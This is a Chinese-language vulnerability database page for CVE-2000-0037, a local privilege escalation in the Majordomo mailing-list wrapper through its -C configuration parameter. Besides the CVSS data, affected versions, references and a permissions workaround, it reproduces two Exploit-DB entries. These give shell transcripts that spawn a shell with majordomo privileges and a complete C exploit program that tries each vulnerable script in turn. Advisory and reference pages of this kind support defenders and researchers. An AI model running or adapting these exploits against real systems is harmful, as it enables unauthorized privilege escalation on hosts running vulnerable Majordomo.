CVE-2000-0037
CVSS4.6
发布时间 :1999-12-28 00:00:00
修订时间 :2016-10-17 22:06:16
NMCOE    

[原文]Majordomo wrapper allows local users to gain privileges by specifying an alternate configuration file.


[CNNVD]Majordomo Local -C参数漏洞(CNNVD-199912-094)

        Majordomo包中存在漏洞,本地用户利用该漏洞通过指定一个备用的配置文件来获得特权。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:great_circle_associates:majordomo:1.94.4
cpe:/a:great_circle_associates:majordomo:1.94.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0037
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0037
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-094
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=94780294009285&w=2
(UNKNOWN)  BUGTRAQ  20000113 Info on some security holes reported against SCO Unixware.
http://www.redhat.com/support/errata/RHSA-2000-005.html
(UNKNOWN)  REDHAT  RHSA-2000:005
http://www.securityfocus.com/bid/903
(UNKNOWN)  BID  903

- 漏洞信息

Majordomo Local -C参数漏洞
中危 输入验证
1999-12-28 00:00:00 2005-05-02 00:00:00
本地  
        Majordomo包中存在漏洞,本地用户利用该漏洞通过指定一个备用的配置文件来获得特权。
        

- 公告与补丁

        A temporary solution is to chmod o-x the majordomo binary. This will prevent users who are not in group majordomo from executing it.
        It is easily possible to remove 'all' interactive access to all the pieces
        of the majordomo software, even if you are using smrsh, without modifying
        the majordomo software itself.
        * set the group id in majordomo's makefile to group 'mail'
         (assuming you're the same as RedHat and mail is delivered
         as mail.mail on your o/s - check it with a script that runs 'id')
         * remove world r-x on majordomo's home dir and its contents
         * remove world r-x on the list dir and its contents
         * still have the symbolic link to wrapper for smrsh to work if you
         have that installed with your sendmail
        Great Circle Associates Majordomo 1.94.5
        

- 漏洞信息 (19699)

Majordomo 1.94.4/1.94.5 Local -C Parameter Vulnerability (1) (EDBID:19699)
linux local
1999-12-29 Verified
0 Shevek
N/A [点击下载]
source: http://www.securityfocus.com/bid/903/info

It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges. 

This occurs on several scripts: archive2.pl, bounce-remind, config-test, digest, majordomo, request-answer and resend. medit under bin/, and archive_mh.pl, new-list, and sequencer under Tools/ uses 'require' in the same way, but since the wrapper only executes those scripts found in the majordomo installation directory, they cannot be exploited.

shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
------

Here's another example (using a different script), posted to Bugtraq by Federico G. Schwindt <Federico G. Schwindt> on May 23, 2000:

$ cat /tmp/myconf
system("/bin/sh");
$ id
uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
$ ./wrapper bounce-remind -C /tmp/myconf
$ id
uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)		

- 漏洞信息 (19700)

Majordomo 1.94.4/1.94.5 Local -C Parameter Vulnerability (2) (EDBID:19700)
linux local
1999-12-29 Verified
0 morpheus[bd]
N/A [点击下载]
source: http://www.securityfocus.com/bid/903/info
 
It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges.
 
This occurs on several scripts: archive2.pl, bounce-remind, config-test, digest, majordomo, request-answer and resend. medit under bin/, and archive_mh.pl, new-list, and sequencer under Tools/ uses 'require' in the same way, but since the wrapper only executes those scripts found in the majordomo installation directory, they cannot be exploited.

/*
		MAJORDOMO - EXPLOIT F�R LINUX
		    getestet bis v1.94.5
		  programmiert von Morpheus
		  
    Der Exploit basiert auf der fehlerhaften Nutzung von Majordomo-
    Skripten. Standardm��ig wird vom Exploit das "bounce-remind"-Skript
    verwandt. Bei Erfolg liefert der Exploit eine Shell mit einer uid
    und gid dem Majordomo Wrapper entsprechend gesetzt.
    Getestet wurde der Exploit auf SuSE Linux 6.0 / 6.3 (CeBIT-Version).		    

    Zur Kompilierung des Exploits:
    
    	gcc major.c -o major    
    
    Zur Nutzung des Exploits:
    
    Wenn der Exploit <major> hei�t dann einfach ./major eingeben. Es
    sollte gen�gen. Wenn dann keine Shell gestartet wird, bitte die
    Fehlermeldungen beachten. Entweder ist die Majordomo-Version nicht
    "kompatibel" oder das Majordomo-Skript ist nicht vorhanden. Dann
    sollte man entweder ./major auto eingeben, so dass der Exploit
    alle verwundbaren Skripts ausprobiert, oder man gibt ./major <skript>
    ein, wobei <skript> durch ein verwundbares Majordomo-Skript zu ersetzen
    ist. Um die Hilfe-�bersicht zu bekommen, einfach ./major -h eingeben.
		    

    Programmiert von Morpheus [BrightDarkness] '00
    URL:  www.brightdarkness.de
    Mail: morpheusbd@gmx.net

    
    Dieser Bug in Majordomo wurde nicht von mir entdeckt. Ich habe nur
    zu diesem Bug den entsprechenden Exploit programmiert.
*/

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define MAJORDOMO	"/usr/lib/majordomo/wrapper"
#define SHELL 		"system(\"/bin/sh\")"
#define MORPHEUS	"/tmp/morpheus"
#define WRAPPER		"wrapper"

void intro(void);
void usage(char *arg);

int main(int argc, char **argv)
  {
    char skript[30];
    char *skripte[40];
    int i = 0;    
    int file;

    skripte[1] = "bounce-remind";
    skripte[2] = "archive2.pl";
    skripte[3] = "config-test";
    skripte[4] = "digest";
    skripte[5] = "majordomo";
    skripte[6] = "request-answer";
    skripte[7] = "resend";
        
    if ((argc == 2) && (strcmp(argv[1], "-h") == 0))
      usage(argv[0]);
    
    if (argc == 2)
      strncpy(skript,argv[1], strlen(skript));
    else
      strcpy(skript, "bounce-remind");
    
    if ((file = open(MORPHEUS, O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0)
      {
        perror(MORPHEUS);
        exit(1);
      }
    write(file, SHELL, strlen(SHELL));
    close(file);

    intro();
    if (strncmp(skript, "auto") == 0)
      {
        for (i = 1; i <= 7; i++)
          {
            printf("using : %s\n", skripte[i]);
            if (execl(MAJORDOMO, WRAPPER, skripte[i], "-C", MORPHEUS, 0) == -1) perror("EXECL");
          }
      }
    else
      {
        printf("using : %s\n", skript);
        if (execl(MAJORDOMO, WRAPPER, skript, "-C", MORPHEUS, 0) == -1) perror("EXECL");      
      }        
    return 0;
  }

void intro(void)
  {
    printf("\033[2J\033[1;1H");
    printf("\033[1;33mExploit-Code f�r Majordomo Wrapper <= v1.94.5\n");
    printf("\033[1;32mProgrammiert von Morpheus [BrightDarkness] '00\n");
    printf("\033[1;31mURL:  \033[1;32mwww.brightdarkness.de\n");
    printf("\033[1;31mmail: \033[1;32mmorpheusbd@gmx.net\n");
    printf("\033[0;29m");
  }

void usage(char *arg)
  {
    intro();
    printf("\033[1;34m");
    printf("Hilfe f�r dieses Programm :\n");
    printf("Benutzung : %s -h           Help screen\n", arg);
    printf("            %s auto         Trying all scripts automatically\n", arg);
    printf("            %s <skriptname> Tries just this <script>\n", arg);
    printf("\033[0;29m");
    exit(0);
  }		

- 漏洞信息

1181
Majordomo -C Parameter Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1999-12-28 Unknow
1999-12-28 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站